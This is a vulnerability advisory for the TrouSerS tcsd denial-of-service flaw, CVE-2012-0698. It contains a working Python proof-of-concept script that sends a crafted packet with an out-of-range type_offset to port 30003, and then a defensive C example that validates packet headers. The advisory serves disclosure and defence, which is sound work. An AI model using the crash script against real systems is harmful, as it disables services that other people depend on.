TrouSerS tcsd Denial-of-Service Vulnerability

Published: 2012-11-26
Updated: 2012-11-28

Affected systems:
sourceforge trousers < 0.3.10
sourceforge trousers
Description:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2012-0698

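TrouSerS is an open-source TCG Software Stack. tcsd is the sole entry point to the TPM device driver.

tcsd in TrouSerS versions before 0.3.10 contains a security flaw in its implementation: by sending a TCP packet with a specially crafted type_offset value to port 30003, a remote attacker can exploit this vulnerability to cause a denial of service.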

<*Source: Andy Lutomirski
 
  Link:
*>

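Test method:
--------------------------------------------------------------------------------

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!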

# crash_tcsd.py
# Copyright (c) 2012 Andy Lutomirski.  All rights reserved.
#
# Permission is granted to anyone to copy and redistribute this file verbatim.
# Permission is *not* granted to distribute modified copies or derivative works.

import struct
import socket
import time

# UnloadBlob_PCR_EVENT also appears buggy.

crasher = struct.pack('>IIIIIII',
                      28, # packet_size = sizeof(tcsd_packet_hdr)
                      11, # ordinal: LoadKeyByBlob
                      1, # num_parms = 1 (so first getData doesn't bail)
                      0, # type_size = 0
                      0x80000000, # type_offset is off in lala land
                      0, # parm_size = 0 (skip checking)
                      28, # parm_offset: see getTCSDPacket
                      )

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)
s.connect(('127.0.0.1', 30003))
s.send(crasher)
s.shutdown(socket.SHUT_WR)
s.close()

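Recommendation:
--------------------------------------------------------------------------------
Vendor patch:

sourceforge
-----------
The vendor has not yet provided a patch or upgrade program. We recommend that users of this software keep checking the vendor's home page for the latest version: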

?p=trousers/trousers;a=commit;h=ae0c2f8c1fd7a96ba0191f83b6057f8cbc51e786
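
The header check a receiver can run before using either offset from a packet like the one in the script above, as an added example: this is not TrouSerS code and not the vendor's fix. The struct and function names are hypothetical, the 28-byte layout is taken from the script's field comments, the rule that data must follow the header is an assumption, and both sample packets are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define HDR_SIZE 28u /* seven big-endian 32-bit fields, as the script packs them */

struct tcsd_hdr { /* hypothetical name; field order follows the script's comments */
    uint32_t packet_size, ordinal, num_parms;
    uint32_t type_size, type_offset, parm_size, parm_offset;
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

/* 1 if [off, off+len) lies after the header (assumption) and inside the packet.
 * Written with a subtraction so a huge off or len cannot wrap the comparison. */
static int region_ok(uint32_t off, uint32_t len, uint32_t packet_size)
{
    return off >= HDR_SIZE && off <= packet_size && len <= packet_size - off;
}

/* Returns 0 and fills *h when the header is self-consistent, -1 otherwise. */
int tcsd_hdr_validate(const uint8_t *buf, size_t received, struct tcsd_hdr *h)
{
    uint32_t f[7];
    if (received < HDR_SIZE)
        return -1;                       /* header itself is truncated */
    for (int i = 0; i < 7; i++)
        f[i] = be32(buf + 4 * i);
    *h = (struct tcsd_hdr){ f[0], f[1], f[2], f[3], f[4], f[5], f[6] };
    if (h->packet_size < HDR_SIZE || h->packet_size > received)
        return -1;                       /* claimed size disagrees with bytes read */
    if (!region_ok(h->type_offset, h->type_size, h->packet_size) ||
        !region_ok(h->parm_offset, h->parm_size, h->packet_size))
        return -1;                       /* an offset points outside the packet */
    return 0;
}

/* Constructed samples: the header values from the script above, and a
 * well-formed packet with one type byte followed by a 4-byte parameter. */
static const uint8_t sample_bad[28] = { 0,0,0,28, 0,0,0,11, 0,0,0,1, 0,0,0,0,
    0x80,0,0,0, 0,0,0,0, 0,0,0,28 };
static const uint8_t sample_ok[33] = { 0,0,0,33, 0,0,0,11, 0,0,0,1, 0,0,0,1,
    0,0,0,28, 0,0,0,4, 0,0,0,29, 1, 0,0,0,7 };

int main(void)
{
    struct tcsd_hdr h;
    printf("script header: %d\n", tcsd_hdr_validate(sample_bad, sizeof sample_bad, &h));
    printf("well-formed:   %d\n", tcsd_hdr_validate(sample_ok, sizeof sample_ok, &h));
    return 0;
}
```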
